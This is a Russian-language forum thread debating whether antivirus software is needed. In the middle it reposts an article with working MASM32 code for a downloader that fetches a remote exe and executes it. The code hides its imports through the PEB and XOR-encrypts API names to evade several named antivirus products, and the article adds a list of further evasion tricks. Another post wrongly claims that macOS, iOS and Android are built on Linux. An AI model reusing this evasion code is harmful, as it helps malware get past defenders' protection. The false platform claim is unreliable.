| Автор |
Сообщение |
apost-r
Стаж: 13 лет
Сообщений: 1557
Ratio: 64.358
100%
|
catterpillar82 писал(а):  | без антивируса можно и даже гораздо лучше работать/отдыхать/развлекаться на компьютере. |
несомненно. если бы ещё все вокруг были бы такими умными и продвинутыми как catterpillar82! а подавляющее большинство без антивиря жить не может. удивительно, правда? более того: без этих вот "высоконаучных" статеек с изначальной целью автора получить за них гонорар - преспокойно проживёт! ибо не влияют они абсолютно ни на что кроме благосостояния автора. про ms-blast я-то поностальгировал, ага. а тебе реально его трогать приходилось? я не забыл как народ ко мне косяками бегал: "дай поработь - везде всё рухнуло"  просто я как умный вовремя сеть отключил. дык я теперь кто? офигенный специалист по борьбе с вируснёй, да? вот в глазах тех щасливых юзверей - ДА!  ну, потом обновления поставил, дырку заткнул, сетку включил. это давно было, тогда тырнет не был предметом первой необходимости.  а так вам напиши: мойте руки перед едой - кто-нибудь обязательно выступит: "а я никогда не мою и ещё живой"  ну, не мойте руки - делов-то! толще двух сантИметров - грязюка сама отваливается.  | ! | Примечание от WASO: | Всем участникам форума запрещается: 2.13. Злоупотреблять использованием... смайликов.
P.S. Рекомендуется ограничиваться 3-мя штуками. 
| |
|
|
 |
energix
Стаж: 15 лет 6 мес.
Сообщений: 1935
Ratio: 3.765
Поблагодарили: 1222
98.39%
Откуда: СССР
|
Защищенный компьютер или нет - дело пользователя. В свою очередь скажу, те кто пытается обосновать ненадобность использования антивирусов сами себе усложняют жизнь. И никакие песочницы не помогут.... Если хочется топтаться на месте, переустанавливать систему, терять данные - флаг в руки.... Пусть живут в неведении, зараженная система плохо лечится, а антивирус не для лечения, его обязанность не допустить заражение. |
|
|
 |
Ден1978 ®
Стаж: 16 лет 2 мес.
Сообщений: 670
Ratio: 120.267
Поблагодарили: 11393
100%
|
Обходим все популярные антивирусы, или лажовая защита в действии
На днях лень было заниматься чем-то сложным, поэтому решил заняться трендовым нынче направлением - обманом антивирусов. Сейчас статей типа "апходим мегакрутой онтевирус" в том же журнале "Хакер" развелось немеряно, причем способы обхода антивирусов авторы выбирают наиприметивнейшие: банальное шифрование строк статическим ключом, добавление формальных задержек (Sleep) и прочие вещи, вводящие в заблуждение только самые недалекие антивирусы. Представьте: автор пишет [ерунду] на 3-4 страницы, размазывая на них анализ своего мегавируса тремя антивирусами, и в итоге даже не способен обойти все из выбранных антивирей, а получает за это 5000 рублей. Несправедливо, тем более времени на написание такой статьи необходимо совсем немного, часа два! Итак, я потратил около часа на то, чтобы написать программу, скачивающую из интернета exe-файл и сразу запускающую ее. Удалось обойти антивирусы Kaspersky Internet Security 2011, NOD32, Dr. Web, Microsoft Security Essentials и Avast. Скорее всего, и другие бы ничего не заметили, просто не проверял. А антивирусы из списка выше даже не пикнули, когда запускался файл, скачанный только что из интернета. Сразу скажу - я приведу не только тот способ, которым воспользовался в своей программе, но и некоторые идеи по обходу, которые я не проверял, но которые вполне могут быть на руку (и это не шифрование строк простым xor'ом со статическим ключом). Я выбрал язык assembler и компилятор MASM32. На ассемблере удобно можно творить беспредел, в отличие от других языков. Итак, сначала моя программа приняла такой вид: | Цитата: | .386 .model flat, stdcall option casemap :none
include \masm32\include\windows.inc include \masm32\macros\macros.asm uselib kernel32, user32, urlmon, shell32
.code start PROC invoke URLDownloadToFile, 0, chr$("http://kaimi.ru/hello_world.exe"), chr$("hello_world.exe"), 0, 0
invoke ShellExecute, 0, chr$("open"), chr$("hello_world.exe"), 0, 0, SW_SHOWNORMAL
invoke ExitProcess, 0 start ENDP end start | Конечно, она была удалена моим антивирусом сразу после сборки. Еще бы - подряд идут две самые глупые и палевные функции - URLDownloadToFileA и сразу за ней ShellExecuteA. Но! Я не собираюсь использовать другие функции, я собираюсь надрать антивирусам задницу, используя именно эти простейшие, дабы показать, насколько у нас по-прежнему несовершенна антивирусная защита. Первое, что мне пришло в голову - скрыть имена этих функций из таблицы импорта и искать их адреса хитрым образом через PEB (это недокументированная структура Windows, которая выдается каждому процессу системы и содержит массу полезной информации, я когда-нибудь напишу про нее статью, а пока что можете поискать описание на ntinternals). Мне ничто не мешало это сделать, тем более, я и макросы для вызова функций без использования таблицы импорта не так давно писал. Что ж, воспользуемся ими: | Цитата: | .386 .model flat, stdcall option casemap :none
include \masm32\include\windows.inc include \masm32\macros\macros.asm include no_import.asm uselib kernel32, user32
.code start PROC noimport_invoke_load chr$("URLDownloadToFileA"), chr$("urlmon.dll"), 0, chr$("http://kaimi.ru/hello_world.exe?12"), chr$("hello_world.exe"), 0, 0
noimport_invoke_load chr$("ShellExecuteA"), chr$("shell32.dll"), 0, chr$("open"), chr$("hello_world.exe"), 0, 0, SW_SHOWNORMAL
invoke ExitProcess, 0 start ENDP end start | Вкратце: через PEB мы ищем адрес ядра (kernel32.dll), парсим его таблицу экспорта до тех пор, пока не найдем функцию GetProcAddress, а с ее помощью получаем адрес функции LoadLibraryA. Этих двух функций нам вполне достаточно для получения адресов всех необходимых нам функций в любых библиотеках. Теперь у программы всего один импорт - ExitProcess, его я вызвал явно, как и в первом варианте. После этого NOD32 сразу посчитал файл легальной программой и даже дал ему исполниться! Но вот Dr.Web продолжал определять программу как Trojan.Downloader. "Неужели они умеют эмулировать PEB?", - подумал я. Но не тут-то было, они, по всей видимости, просто считали, что если в программе есть строки URLDownloadToFileA и ShellExecuteA, то это вирус! Давайте их зашифруем. Только зашифруем так, как это нужно делать, чтобы только на реальной машине они расшифровывались без проблем. Воспользуемся малоизвестной WinAPI-функцией, о которой антивирус, скорее всего, ничего не знает: | Цитата: | .386 .model flat, stdcall option casemap :none
include \masm32\include\windows.inc include \masm32\macros\macros.asm include no_import.asm uselib kernel32, user32
.code string_coder PROC data:DWORD LOCAL buf[16]:BYTE
invoke lstrlen, data mov esi, data mov edi, eax
next_sym: .if edi > 0 invoke SetLastError,0 invoke QueryDosDevice, chr$("C:"), addr buf, 5
.if eax == 0 invoke GetLastError and al,0Fh dec al xor byte ptr [esi],al inc esi dec edi jmp next_sym .endif .endif
mov eax, data ret string_coder ENDP
start PROC LOCAL funcname:DWORD
noimport_call_prepare
.data fname db "\[EMf~gefhm]fO`elH",0 .code
mov funcname, FUNC(string_coder,offset fname) noimport_invoke_load funcname, chr$("urlmon.dll"), 0, chr$("http://kaimi.ru/hello_world.exe?12"), chr$("hello_world.exe"), 0, 0
mov funcname, FUNC(string_coder,chr$("ZaleeLqlj|}lH")) noimport_invoke_load funcname, chr$("shell32.dll"), 0, chr$("open"), chr$("hello_world.exe"), 0, 0, SW_SHOWNORMAL
invoke ExitProcess, 0 start ENDP end start | А теперь по порядку. Добавилась процедура string_coder, принимающая единственный параметр - указатель на строку, которую необходимо расшифровать или зашифровать. Так как я использую операцию xor для шифрования, функция обратима: прогнали ей один раз строку - получили зашифрованную, прогнали второй - расшифровали. Но я не использую статический ключ шифрования, я, как уже и сказал, воспользовался функцией QueryDosDevice, которая позволяет получить некоторую информацию о желаемом диске. Вся фишка тут в том, что я передал ей вполне легальные параметры, но вот размер буфера очень ограничил (последний параметр функции - 5 байтов, а этого явно мало для записи целой длинной строки с информацией). А это значит, что функция вернет ошибку (0), и дальше я проверяю это. Но и это еще не все - после такого обращения к функции последняя ошибка будет выставлена в ERROR_INSUFFICIENT_BUFFER, о чем антивирус вообще едва ли знает, и именно это значение (после некоторых преобразований, чтобы зашифрованный вариант был текстовым, как и оригинальная строка) я и использую для шифрования строк. В остальной части программы ничего не поменялось, за исключением того, что теперь я сначала расшифровываю зашифрованные строки и только после этого вызываю сами функции. Теперь у меня и импорты менее приметные стали - используются штатные функции SetLastError, GetlastError, QueryDosDevice и ExitProcess. Теперь программа не то что не определяется, но и даже спокойно выполняется под контролем всех антивирусов, которые я перечислил в начале статьи - Kaspersky Internet Security 2011, NOD32, Dr. Web, Microsoft Security Essentials и Avast. Такими результатами вполне можно гордиться. Как мы только что выяснили, ни один из этих антивирусов не эмулирует PEB и ядро kernel32, подгруженное всегда в любой процесс Windows (или просто не знает ничего о функции QueryDosDevice, или вообще и то и то одновременно). Скорее всего, после написания этой статьи такой способ быстро будет обнаруживаться по сигнатурам, но это ведь не мешает немного изменить код и добиться прежнего результата? А теперь еще несколько мыслей по обходу, которые могут сработать (и точно работают со многими антивирусами). Эти способы совершенно не новы, но это не делает их устаревшими и неактуальными. 1. Запуск программой самой себя с некоторыми параметрами командной строки, обработка параметров и выбор пути дальнейшего действия в зависимости от переданных параметров, либо же использование переданных параметров для расшифровки некоторого блока кода, который не нравится антивирусам. 2. Использование сообщений Windows. В принципе, все как и в первом пункте, просто следует слать себе некое сообщение (либо пользоваться стандартными сообщениями Windows) и использовать в обработчике полученное сообщение как ключ шифрования либо как маркер для выбора дальнейшего пути исполнения. 3. Использование в коде большого количества малоизвестных WinAPI-функций (что, впрочем, я сделал в этом примере), применение возвращенных значений или кодов ошибок в дальнейшей логике программы. 4. Запись собственного кода в некое место штатной API-функции в памяти (это, естественно, затронет только наш процесс, т.к. DLL с API-функциями грузятся в каждый процесс отдельно), а затем ее вызов. 5. Для вирусов типа "скачай из интернета плохой exe-файл - запусти его" можно вместо URLDownloadToFile использовать, например, сокеты либо еще какие-то сетевые API Windows - и количество антивирусов, определяющих такую малварь, сразу уменьшится раза в полтора-два. Если немного подумать, можно и другие способы привести и реализовать, но этих пока хватит. Собранный исходный код я не выкладываю, если кого-то заинтересует тема, сможет собрать его и сам. И помните: материал приведен лишь с той целью, чтобы показать слабые места существующих современных антивирусов, а не сподвигнуть вас на написание тонн вирусов - за это нести ответственность будете вы сами. |
|
|
 |
apost-r
Стаж: 13 лет
Сообщений: 1557
Ratio: 64.358
100%
|
Ден1978, ну и жить этому "обходу лажовой защиты" от обращения юзера (одного или нескольких) с описанием траблы до первого ближайшего обновления баз. и всё. плавали, знаем!  |
|
|
 |
catterpillar82
Стаж: 14 лет 4 мес.
Сообщений: 1361
Ratio: 87.914
Раздал: 32.7 TB
100%
|
apost-r Ой , что-то дико сомневаюсь про гонорары автора... Кто заплатит ему за такую антирекламу? Вот, если бы он наоборот рекламировал бы так какой-нибудь "продукт" антивирусной компании, тогда да, чего-то бы они ему там отстегнули. А он то пишет о том, что любым крупным компаниям, особенно вложившимся, абсолютно не выгодно. Просто всё больше пользователей уже начинают немного смекать что к чему...
Добавлено спустя 23 минуты 6 секунд:
energix В самом деле? И почему же это у меня до сих пор обе системы, WS2003 и W7, не заражённые? Сканирую иногда самым свежим вебовским сканером. А устанавливал я себе WS2003 более года назад. И почти год параллельно сидел на чистом WS2008, семёрку только пару месяцев назад поставил из-за встроенного по умолчанию нетфреймвёрка 3.5. За системами своими следить надо: установил, настроил, оптимизировал, поустанавливал весь нужный софт, сделал очистку, дефрагментацию разделов, реестра и тогда только акронисом образ системного раздела на специально созданный для этого раздел.
Да, для кого-то заморочки и геморрой, а кто-то в последствии имеет полностью настроенную, быструю, стабильную OC, да ещё и с подстраховкой. Потом только по мере надобности нормальный дефрагментатор, деинсталлятор и легенда/классика сиклинер.
А что такое переустановка вообще забыл -- акронисы, серверный и клиентский (адвансед есть, так ему пофиг на издание винды) чудо програмистской мысли, настроенную под себя систему можно вообще на другое железо развернуть (юниверсал рестор). Пару раз разворачивал образ системного раздела (кстати, всегда без проблем!) и то, после парочки экспериментов в реестре, система работала, просто ошибки раздражающие выскакивали, которые не поборол (или в лом было).
Здесь, автор пишет о том, что настроить саму винду на безопасность куда лучше и эффективней, чем пользоваться тем, что не только своего названия не оправдывает, но ещё и не даёт что-то скачивать, устанавливать, куда-то постоянно строчит доносы... ой, отчёты о системе... P. S. Если многа букаф -- извините... |
_________________ Xeon E5-2667 v2 (8/16) 3.8GHz / Scythe Mugen 5 / ASUS P9X79 Pro / ASUS ProArt RTX 4060 OC / 32GB 4x8GB G.SKILL Ares DDR3 2400Mhz / Plextor M5 Pro 256Gb / Samsung 850 PRO 1Tb / WD Gold 2TB WD2005FBYZ / Creative X-Fi Titanium (SB0880) / Intel PRO/1000 ET Dual Port Server Adapter / EVGA G3 SuperNOVA 750W / Dell E2417H / Windows Server 2022 Standard
|
|
 |
apost-r
Стаж: 13 лет
Сообщений: 1557
Ratio: 64.358
100%
|
catterpillar82, ну давай я тож много буковок нарисую. я уже говорил, что этой статейке - сто лет в обед. сходи - глянь про автора в википедии. кто таков и на что горазд. вроде как доступ туда не прекращался..  не веришь: посмотри на соседние статейки на том же ресурсе - прослезись, как давно это было. помнит только мутной реки вода. © как уже давно известно бытие определяет сознание. или, чуть более доступно: кто как живёт - тот так и ездит. что за рулём, что на мониторчек глядючи. умники и умницы - не в счёт. их настолько мало, что исключения только подтверждают правила. а что касается вирусни у простых смертных, коих подавляющее большинство: дык если себя вирусня НИКАК себя не проявляет - её никто и не замечает. ну прям согласно немецкой классической философии.  но вот стоит только троянчекам до такой степени расплодиться на любимом ноуте, что и фконтакт не пускает, и майло не посмотреть - вот только тогда начинаются вопли о том, как всё плохо. ну принесут тебе такую тачку, ну смоешь оттедова десятка два троянов, скажешь: "давай сохраняй свои ценности куда-нить, тебе винду пора перенамазать" - дык счастливый обладатель переставшего тормозить ноута нифига не вернётся и тут же забудет обо всём: тормоза-то прошли! щастье настало!  вот таким ребяткам точно глубоко инвариантно какой у них антивирус в системе кто-то им поставил и поставил ли вообще. тормоза прошли - ура! а что где-то дыра - это уже потом, если опять заболеет - полечимся.  и таких: народу - тыщи. колоды неисчислимые. если есть желание, время, инетерс вирусню пальчиками выковыривать - вэлкам! мышь в помощь. а мне вот лень. неинтересно это. когда-то давно игрался с какой-то платкой маленькой. вроде как она называлась "плата восстановления данных" эффект был такой: с болванки грузишься, форматируешь хард с системой, перегружаешься с него - а там опять винда нетронутая! впечатляло, ага. только не прижилось. а так эффект был неописуемый: добавляй - удаляй чего хошь, после перезагрузки - всё как и было. вот это антивирус - я понимаю! для пионеров - самое оно.  но не прижилось, увы. но в абсолют возводить какой-то антивирь - птьфу! там никто никому ничего не должен. принесли мне как-то авторанчик на свистке. давно уже дело было. ну явно зараза. плодится, тварь, прям на глазах. ты её в дверь - она в окно. касперыч свежий ничего не замечает в упор. дрвеб тоже курииит.  ну, я его в архивчик и мылом касперам шлю: ваше? те - молчок. потом прочитал, что они не разговаривают. стесняются. я - докторам вебам. они ответили: ага, говорят, наше! жди обновления - там всё будет. так оно и вышло. каспер тоже обновился - всё почикал. дык я потом эту заразу скармливал разным "халявным" антивирям - нулём! в упор никто ничего не видит. ну и спрашивается: а зачем мне такая бесплатная защита? а ещё помню лет несколько назад, когда была эпидемия вин-локеров, люди, за деньги купившие какой-нить модный кав-кис искренне недоумевали: я ж денег им платил! чего ж он меня не защитил!? кстати, ни одной машинки с "залоченой" семёриной мне не приносили. вот хр - немеряно. всё-таки хватило ума простого юзера одмином не делать, ага... и пущай плодятся в своём разноообразии винлокеры - нам всё равно. у нас есть uvs.  где лёгким движением руки... а реестр вручную чистить - я не хочу. мне лень. так что каждому - своё. антивири пущай за вируснёй гоняются, а я уж лучше в другом месте пользу обществу принесу, чем буду пальчиками эту самую вирусню выковыривать. | ! | Примечание от WASO: | Всем участникам форума запрещается: 2.13. Злоупотреблять использованием... смайликов.
P.S. Рекомендуется ограничиваться 3-мя штуками. 
| |
|
|
 |
Ден1978 ®
Стаж: 16 лет 2 мес.
Сообщений: 670
Ratio: 120.267
Поблагодарили: 11393
100%
|
apost-r писал(а):  |
|
Радует что нет фанатичной веры в антивирь, а трезвое понимание сути вещей. У меня тоже есть масса примеров, когда человек недоумевает, словив вирус. Говорит ведь у меня стоит самый самый, самый свежий и самый крутой антивирь  |
|
|
 |
apost-r
Стаж: 13 лет
Сообщений: 1557
Ratio: 64.358
100%
|
Ден1978 ну, за трезвость!  |
|
|
 |
catterpillar82
Стаж: 14 лет 4 мес.
Сообщений: 1361
Ratio: 87.914
Раздал: 32.7 TB
100%
|
apost-r Да зарисуй хоть весь форум... и смайликами тоже)) Но лучше не усердствуй, а то ещё один пред, а там и бан, WASO серьёзный парень, банил меня. Пару раз...
Я ж те говорю: плевать с высокой башни на то кто и как живёт автор и сколько лет или десятилетий его статейке... Да и википедии я в этом плане совершенно не доверяю, тем более, что она так отчаянно нуждается в деньгах. Тут как всегда: идёшь против системы -- ты и предатель и совратитель малолетних и наркотики принимаешь и с русской мафией связан... Букет всегда можно дорисовать, картина ж маслом.
Не, ну ёлы... я конечно тоже не претендую на знатока чисто русского языка и далеко не всегда получается подобным образом общаться, но тебя, уважаемый, местами тяжеловато читать и понимать из-за излишних народных оборотов и выражений (ну х. з., мне может одному так кажется)
А что до остального, типо выковыривать вирусы вручную из реестра, без обид: не неси откровенный бред. Уже отвечал по подобному energix -у, повторяться не буду. |
_________________ Xeon E5-2667 v2 (8/16) 3.8GHz / Scythe Mugen 5 / ASUS P9X79 Pro / ASUS ProArt RTX 4060 OC / 32GB 4x8GB G.SKILL Ares DDR3 2400Mhz / Plextor M5 Pro 256Gb / Samsung 850 PRO 1Tb / WD Gold 2TB WD2005FBYZ / Creative X-Fi Titanium (SB0880) / Intel PRO/1000 ET Dual Port Server Adapter / EVGA G3 SuperNOVA 750W / Dell E2417H / Windows Server 2022 Standard
|
|
 |
apost-r
Стаж: 13 лет
Сообщений: 1557
Ratio: 64.358
100%
|
catterpillar82, ну мне искать лень опять же чо и кому ты где говорил. уж извини.  но, помнится, первые вымогатели я ручками выковыривал из реестра, изо всяких там темпов и т.д. и чо тут такого изумительного? просто долго и противно. ну всё одно , что голыми руками разгребать всякое... но уж всяко одминского гневу не страшнее!  вишь вот - лимит смайликов блюду, ога.  |
|
|
 |
catterpillar82
Стаж: 14 лет 4 мес.
Сообщений: 1361
Ratio: 87.914
Раздал: 32.7 TB
100%
|
apost-r Пнятно... А я вот современные вымогатели знакомым выковыривал, которые они время от времени ловили с установленным "антивирусом". Затем удалял к чёртовой бабушке антивирус, настраивал систему и делал бэкап всего системного раздела акронисом. Потом, когда снова являлся к таким тугим личностям, больше 20-ти минут не тратил. А с друзей друзей вообще за такое деньги беру. Типо не хотите быть хоть чуть-чуть понимающими юзерами -- будьте платящими юзерами, я то время своё трачу. По такому принципу, скорее всего, работают и антивирусные компании. Да вот разница только в эффективности. |
_________________ Xeon E5-2667 v2 (8/16) 3.8GHz / Scythe Mugen 5 / ASUS P9X79 Pro / ASUS ProArt RTX 4060 OC / 32GB 4x8GB G.SKILL Ares DDR3 2400Mhz / Plextor M5 Pro 256Gb / Samsung 850 PRO 1Tb / WD Gold 2TB WD2005FBYZ / Creative X-Fi Titanium (SB0880) / Intel PRO/1000 ET Dual Port Server Adapter / EVGA G3 SuperNOVA 750W / Dell E2417H / Windows Server 2022 Standard
|
|
 |
apost-r
Стаж: 13 лет
Сообщений: 1557
Ratio: 64.358
100%
|
catterpillar82, ну это смотря какие друзья. может у них что-то другое лучше получается.  в опчем вывод: за много лет по сути абсолютно НИЧЕГО нового не придумано. всё как было - так и есть. я бэкапил систему, ага. только давно, и не акронисом а ghost'ом. тогда акрониса ещё не было.  в итоге болванок чегой-то многовато скопилось и мне тупо надоело. решил, что проще перенамазать на что-нить свеженькое, с обновленьицами и т.д. а всех вокруг умными всё равно никогда не сделаешь - как не старайся. всегда найдётся какой-нить изобретательный идиот, который обязательно сделает неправильно.  |
|
|
 |
Ден1978 ®
Стаж: 16 лет 2 мес.
Сообщений: 670
Ratio: 120.267
Поблагодарили: 11393
100%
|
Компьютер без антивируса
Я вспоминаю времена когда Windows 2000 у меня работал по несколько лет без переустановки без какого либо антивируса. Это было лет десять назад. Для работы за компьютером без антивируса было достаточно выполнять несколько простых правил безопасности. Сейчас эти правила уже почти не помогают. Сейчас даже компьютер с антивирусом не имеет никаких гарантий нормальной работоспособности, потому что ежедневно появляются тысячи новых все более изошренных вирусов. Если пользователь решит побродить немного по интернету без антивируса, уверяю следующие вопросы которые он начнет задавать будут вроде "у меня глючит компьютер", "как удалить порноинформер", "как удалить вирус". В интернетах море информации о том как удалить вирус. Но даже после переустановки Windows вы все равно регулярно будете возвращаться к этому вопросу снова и снова. Раскажу несколько способов как настроить компьютер для работы без антивируса. Сразу предупреждаю, совет подойдет далеко не всем. Думайте сами, моя задача вас ознакомить с этими способами. Достоинства работы без антивируса заключаются в том, что мы экономим ресурсы компьютера не загружая процессор память и жесткий диск лишней нагрузкой. А многие антивирусы прожорливы чуть более чем слишком. Заморозка жесткого диска Этот способ подходит если вы настраиваете компьютер для кого-то, кто не нуждается в регулярных перенастройках, установке программ, а лишь ищет спокойный способ поработать в какой то программе, побродить по интернету или поиграть в игрушки. Это пожилые люди, секретарша, пользователь интернет кафе. Смысл заключается в том, что с помощью программы Shadow User или Deep Freeze вы замораживаете содержимое жесткого диска таким образом, что все изменения на компьютере после перезагрузки возвращаются в исходное состояние, которое было зафиксировано на момент заморозки. Можно заразить систему вирусами, можно удалить систему, можно установить множество программ. Но все это будет отменено обычной перезагрузкой компьютера. Я обычно использую Shadow User. Так сложилось. В нем есть отличная возможность добавлять директории (папки) в исключения, на которые заморозка не действует. Так, если за компьютером работает бухгалтер, то добавив в исключение директорию с базой данных можно быть увереным, что нужные данные после перезагрузки будут сохранены в то время как вся остальная система будет возвращена в исходное состояние. Тут главное не перепутать директорию с данными и директорию с программой, которая работает с данными. Данные ведь не могут быть заражены, а программа может. Возмьмем к примеру MSSQL. Сама программа находится в C:\Program Files\Microsoft SQL Server, а данные находятся там же в директории DATA. Исключить надо директорию DATA, а не всю директорию с программой управления базой данных. Таким образом можно исключить директории с любыми данными, которые не могут быть заражены: с документами, музыкой, фильмами, фотографиями. Игры, которые имеют EXE файлы лучше было бы заморозить, но если исходить из того, что почти все вирусы сейчас не заражают существующие EXE файлы, а просто записывают свои новые файлы, то можно понадеяться на удачу и исключить тоже. В таком случае прийдется вооружиться каким то антивирусным сканером и периодически сканировать директорию с играми на вирусы. Для этой цели отлично подойдут бесплатные антивирусы такие как AVZ или ClamAV. Подробнее о Shadow User читайте в статье http://internet-club.info/node/43Резюмируя этот способ, можно сказать, что способ работы без антивируса с помощью заморозки не защищает от попадания вируса в компьютер, а лишь гарантирует очень простое избавление от любых вирусов. Работайте под пользователем с ограниченными правами Так повелось, что в Windows все работают с полными правами администратора. Зачем себя ограничивать, если компьютером пользуется только один человек? На самом деле это не верно. Человек за компьютером один, а вирусов много и именно они получив доступ единожды, воспользовавшись проблемой безопасности виндовс прописывают себя во все способы автозагрузки. Так, при включении компьютера вирус вновь получает полное управление и хозяйничает на нем, подсказывая регулярно вам куда надо отправлять СМС с перечислением денег, показывая навязчивую рекламу и пытаясь заразить таких же горе-администраторов. Если вы не кликаете на все полученные по почте приложения, если вы точно знаете что запускаете, если не посещаете сайты сомнительного содержания такие как порносайты, сайты с крэками, варезами, то возможно вам этот способ поможет. Зайдите в "Панель управления" виндовс и в разделе "Учетные записи" создайте пользователя с ограниченными правами. Задайте пароль новому пользователю и пароль для учетной записи "администратор". Всегда работайте только под учетной записью ограниченного пользователя. Чтоб установить программу запускайте инстяляшку через правую кнопку мыши выбрав "Запустить от имени администратора". Так, вы сможете быть уверенным что никто не установит во время вашего отсутствия кейлоггер, граббер паролей или еще какой то троян. Кроме того, в настройках папки обязательно настройте чтоб отображались скрытые файлы. Вы будете удивлены сколько их на вашей флэшке. Смело удаляйте все что вам не нужно. Чтоб знать что собой представляет каждый файл настройте чтоб система отображала расширение файла. Таким образом, вы сможете увидеть что иконка имеющая вид обычной директории имеет расширение EXE. Конечно же так обманывают пользователя только вирусы. Чтоб вирусы не стартовали автоматически при подключении флэшек желательно все флэшки вакцинировать программой вакцинатором, которую можно нагуглить по словам "autorun vaccine". Принцип их действия - резервирование имени файла autorun.inf, который отвечает за автоматический запуск. Это защитит вашу флэшку от заражения. Чтоб компьютер не запускал автоматически вирусы с чужих флэшек отключите в винде автозапуск. Как это сделать я описывал подробно в заметке по ссылке http://www.newmoldova.com/node/11Даже если настроеный компьютер под учетной записью ограниченного пользователя заразится вам не обязательно будет переустанавливать Windows. Достаточно будет сохранить свои документы и удалить директорию пользователя. Но, имейте ввиду, достаточно будет чтоб несколько секунд под записью администратора совместились с деятельностью вируса и система будет заражена. Возможно безвозвратно Тогда прийдется устанавливать ее заново. Не забудьте хотя бы в этом случае создать ограниченного пользователя и работать только под ним. Недостаток этого способа заключается в очень слабой защищенности компьютера и в том, что многие программы просто не работают под ограниченным пользователем. Кроме того, надо четко разбираться в том как ставить права на файлы и директории чтоб ограниченный пользователь не мог изменить файлы программ, а мог изменять только файлы с данными. Использование идеологически правильной операционной системы Конечно же я говорю про бурно развивающуюся операционную систему Linux, которая благодаря более правильному проектированию не приспособлена для жизнедеятельности вирусов. Вообще, таких систем множество. Например MacOS, FreeBSD, DesktopBSD, Solaris. Но, если вы не гик и владелец обычного компьютера с самыми обычными требованиями и знаниями, то вам с большой вероятностью подойдет именно Linux. Не стоит бояться этой системы. В ней можно решать огромное количество задач из разных областей таких как обработка звука, видео, фотографий, 3D графики. А для того чтоб побродить по интернету, пообщаться в скайпе, оформить и распечатать несколько документов - это то что доктор прописал. И самое главное почему доктор прописал Linux, это потому что лечить от вирусов эту систему не прийдется. Для обычной работы антивирус в Linux вообще не нужен. Но если вы захотите почистить флэшки друзьям от вирусов, то без проблем можно установить тот же бесплатный ClamAV. Недостаток этого способа заключается только в моральной неготовности большинства компьютерных пользователей изменить свою жизнь в лучшую сторону отказавшись от вредной привычки имя которой Windows. Реально в линуксе проблемой являются только очень требовательные современные компьютерные игры. И эта проблема решается не по дням, а по часам. Обычные виндовые игры, такие как HalfLife2, Left4Dead, Flatout, любой Need for speed, Starcraft 2 отлично работают. Для самых последних игр прийдется немного почитать руководства с рецептами как их запускать. Долго описывать этот способ нет нужды: просто ставьте Linux и работайте за компьютером без антивируса сколько угодно. Никакие файрволы, антивирусы и прочие системы защиты вам не понадобятся! Вы можете посещать сайты с самым сомнительным содержанием и быть уверенным что это не убьет вашу систему. Конечно существуют несколько вирусов в мире под линукс, но это единичные случаи, которые очень быстро теряют актуальность не успевая распространиться. Чтоб убедиться, что ничего страшного в системе Линукс нет, читайте мою заметку об интернет клубе на Linux Gentoo http://www.newmoldova.com/node/438 Источник |
|
|
 |
apost-r
Стаж: 13 лет
Сообщений: 1557
Ratio: 64.358
100%
|
| Цитата: | Но, если вы не гик и владелец обычного компьютера с самыми обычными требованиями и знаниями, то вам с большой вероятностью подойдет именно Linux. |
да! конечно! |
|
|
 |
Tets
Uploader 500+
Стаж: 19 лет
Сообщений: 1775
Ratio: 185.049
Раздал: 551.1 TB
Поблагодарили: 4673
100%
|
Ден1978 писал(а):  | Заморозка жесткого диска |
Сам на работе использую на некоторых компах, но увы - для автономной работы надо долго трахаться с настройками и исключениями, т.к. помимо сохранения самих документов надо и чтоб индексирование работало и не сбрасывалось и много чего ещё... Ден1978 писал(а):  | Данные ведь не могут быть заражены, а программа может |
Глупости, можно к любым данным дописать что угодно и программа это схавает и исполнит, не просто так макросы по умолчанию имеют высокий уровнь безопасности (правда это не особо помогает при открытии такого заражённого документа). Ден1978 писал(а):  | Игры, которые имеют EXE файлы лучше было бы заморозить |
Вы хоть раз в жизни встречали вирус, заражающий игры или вообще абы какие приложения? Такие вообще существуют? Ден1978 писал(а):  | Чтоб вирусы не стартовали автоматически при подключении флэшек желательно все флэшки вакцинировать программой вакцинатором, которую можно нагуглить по словам "autorun vaccine". Принцип их действия - резервирование имени файла autorun.inf, который отвечает за автоматический запуск. Это защитит вашу флэшку от заражения. |
По своему опыту скажу, что методов, которыми вирусня размножается на флешках, более десятка и "вакцинация" убивает всего один метод, не самый популярный кстати. Ден1978 писал(а):  | Использование идеологически правильной операционной системы |
А это ... даже читать нельзя, очередная чушь про чудесную ОСь "Пингвин", которая подойдёт всем и каждому, но при этом совершенно не дрожелюбна к юзеру, на ней обычный юзер поиграет только в тетрис, она имеет тысячи сборок, которые мало что несовместимы между собой, так и 90% из них просто ужасны в плане забагованности и нестабильности работы - клепают всякое Г все кому не лень, вот и имеем в итоге геморрой. Вы ещё через консоль порекомендуйте поработать юзерам "с обычными знаниями и требованиями"  И подавно не надо сказок про отсутствие вирусов под пингвина, вы в нём видимо мало работаете - ничто не мешает ронять пингвина вируснёй, как и МАК (он же тоже на базе пингвина) и iOS и Android (все они на базе пингвина), как и медиаплееры в телеках - есть к ним вирусня, упаковываемая в медиаконтейнеры... вообщем очередной набор глупых шаблонных мифов. Вирусня в массовом порядке дойдёт до пингвина, когда он отхватит хоть сколько-нибудь значимую долю рынка, а это произойдёт нескоро из-за неадыкватности самой ОСи к юзерам "с обычными знаниями и требованиями". Ден1978 писал(а):  | если вы не гик |
Если написавший сие вообще адекватен, то в первую очередь пусть подумает - а почему подавляющее большинство ПК на винде? (не силком же им её навязывали) Потом проанализирует рынок популярных приложений и вообще перечень популярных задач для ПК. А потом подумает - что надо перенять у винды другим ОСям, чтоб привлечь к себе пользователей и покупателей? И после этого этого станет очевидным, что обычному юзеру пингвин нафиг не сдался - в нём нет ничего, что может заинтересовать обычного пользователя, кроме мифа о неуязвимости ОСи, зато много геморроя с поиском драйверов. Вот, разродился контраргументом, т.к. много лет работаю в разных ОСях и все эти сказки сочиняли ещё в те далёкие годы. PS: Раз у вас пользователи винды "гики", то думаю, что могу позволить и себе не слишком политкорректное общение. |
_________________ В високосном Байте 9 бит.
|
|
 |
|
|
|